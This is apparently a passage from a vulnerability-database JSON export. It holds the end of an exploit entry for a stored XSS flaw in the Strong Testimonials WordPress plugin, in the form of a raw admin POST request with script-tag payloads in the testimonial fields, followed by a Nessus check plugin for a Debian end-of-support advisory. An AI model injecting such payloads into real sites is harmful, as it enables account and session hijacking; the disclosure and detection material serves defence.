Firefox/72.0\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\r\nAccept-Language: en-US,en;q=0.5\r\nAccept-Encoding: gzip, deflate\r\nReferer: http://testing.com/wp-admin/post.php?post=24879&action=edit\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: 1402\r\nOrigin: http://testing.com\r\nConnection: close\r\nCookie: wordpress_f5085b107e100d9e2687f38209d91671=jinson%7C1582988788%7CQJZkFRVzEdZRVbgZsiJIXldlEPTlfFOij2iybAHoVe6%7Cbf600418ab822f99fc55eb651acb102beaa01b055292c0f9d84667c7b490c60c; wp-saving-post=24879-check; wordpress_cf_adm_use_adm=1; wp-settings-time-1=1581780228; PHPSESSID=aeb50c30210014eec857909f45b3fbf3; wordpress_test_cookie=WP+Cookie+check; wordpress_logged_in_f5085b107e100d9e2687f38209d91671=jinson%7C1582988788%7CQJZkFRVzEdZRVbgZsiJIXldlEPTlfFOij2iybAHoVe6%7C376e10c1fa5aeea389a485d0475f4c7dfe659f41d3b21f1b0bf6435838c003c5; tk_ai=woo%3AEeO%2FMlU5TcDNKIjgYWPHxZVg\r\nUpgrade-Insecure-Requests: 1\r\n\r\n_wpnonce=001abb6a10&_wp_http_referer=%2Fwp-admin%2Fpost.php%3Fpost%3D24879%26action%3Dedit%26message%3D1&user_ID=1&action=editpost&originalaction=editpost&post_author=1&post_type=wpm-testimonial&original_post_status=publish&referredby=http%3A%2F%2Ftesting.com%2Fwp-admin%2Fpost.php%3Fpost%3D24879%26action%3Dedit&_wp_original_http_referer=http%3A%2F%2Ftesting.com%2Fwp-admin%2Fpost.php%3Fpost%3D24879%26action%3Dedit&post_ID=24879&meta-box-order-nonce=b39d630598&closedpostboxesnonce=6436439491&original_post_title=XSS+Test&post_title=XSS+Test&samplepermalinknonce=d93284f5e5&content=&wp-preview=&hidden_post_status=publish&post_status=publish&hidden_post_password=&hidden_post_visibility=public&visibility=public&post_password=&mm=01&jj=22&aa=2020&hh=18&mn=02&ss=28&hidden_mm=01&cur_mm=02&hidden_jj=22&cur_jj=15&hidden_aa=2020&cur_aa=2020&hidden_hh=18&cur_hh=15&hidden_mn=02&cur_mn=23&original_publish=Update&save=Update&tax_input%5Bwpm-testimonial-category%5D%5B%5D=0&newwpm-testimonial-category=New+Category+Name&newwpm-testimonial-category_parent=-1&_ajax_nonce-add-wpm-testimonial-category=f7661627a5&menu_order=0&_thumbnail_id=-1&custom%5Bclient_name%5D=%3Cscript%3Ealert%28%27all+testimonials+page%27%29%3C%2Fscript%3E&custom%5Bemail%5D=&custom%5Bcompany_name%5D=%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E&custom%5Bcompany_website%5D=&custom%5Bnofollow%5D=default&excerpt=&post_name=creator\r\n\r\n3. Timeline\r\n\r\nVulnerability reported to the Strong Testimonials team \u2013 January 23, 2020\r\nStrong Testimonials version 2.40.1 containing the fix released \u2013 January 25, 2020\n\n# 0day.today [2020-02-21] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/33983"}], "nessus": [{"lastseen": "2020-02-15T06:57:58", "bulletinFamily": "scanner", "description": "debian-security-support, the Debian security support coverage checker,\nhas been updated in jessie-security.\n\nThis marks the end of life of the libqb package in jessie. A recently\nreported vulnerability against libqb which allows users to overwrite\narbitrary files via a symlink attack cannot be adequately addressed in\nlibqb in jessie. Upstream no longer supports this version and no\npackages in jessie depend upon libqb.\n\nWe recommend that if your systems or applications depend upon the\nlibqb package provided from the Debian archive that you upgrade your\nsystems to a more recent Debian release or find an alternate and up to\ndate source of libqb packages.\n\nAdditionally, MySQL 5.5 is no longer supported. Upstream has ended its\nsupport and we are unable to backport fixes from newer versions due to\nthe lack of patch details. Options are to switch to MariaDB 10.0 in\njessie or to a newer version of MySQL in more recent Debian releases.\n\nNOTE: Tenable Network Security has extracted the preceding description\nblock directly from the DLA security advisory. Tenable has attempted\nto automatically clean and format it as much as possible without\nintroducing additional issues.", "modified": "2020-02-02T00:00:00", "published": "2020-02-14T00:00:00", "id": "DEBIAN_DLA-2103.NASL", "href": "https://www.tenable.com/plugins/nessus/133698", "title": "Debian DLA-2103-1 : debian-security-support update: libqb and mysql-5.5 end", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Debian Security Advisory DLA-2103-1. The text\n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(133698);\n script_version(\"1.1\");\n script_cvs_date(\"Date: 2020/02/14\");\n\n script_name(english:\"Debian DLA-2103-1 : debian-security-support update: libqb and mysql-5.5 end\");\n script_summary(english:\"Checks dpkg output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"debian-security-support, the Debian security support coverage checker,\nhas been updated in jessie-security.\n\nThis marks the end of life of the libqb package in jessie. A recently\nreported vulnerability against libqb which allows users to overwrite\narbitrary files via a symlink attack cannot be adequately addressed in\nlibqb in jessie. Upstream no longer supports this version and no\npackages in jessie depend upon libqb.\n\nWe recommend that if your systems or applications depend upon the\nlibqb package provided from the Debian archive that you upgrade your\nsystems to a more recent Debian release or find an alternate and up to\ndate source of libqb packages.\n\nAdditionally, MySQL 5.5 is no longer supported. Upstream has ended its\nsupport and we are unable to backport fixes from newer versions due to\nthe lack of patch details. Options are to switch to MariaDB 10.0 in\njessie or to a newer version of MySQL in more recent Debian releases.\n\nNOTE: Tenable Network Security has extracted the preceding description\nblock directly from the DLA security advisory. Tenable has attempted\nto automatically clean and format it as much as possible without\nintroducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://lists.debian.org/debian-lts-announce/2020/02/msg00011.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/jessie/debian-security-support\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Upgrade the affected debian-security-support package.\"\n );\n script_set_attribute(attribute:\"risk_factor\", value:\"High\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:debian-security-support\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:8.0\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/02/13\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/02/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/02/14\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"8.0\", prefix:\"debian-security-support\", reference:\"2019.12.12~deb8u2\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 0.0, "vector": "NONE"}}]}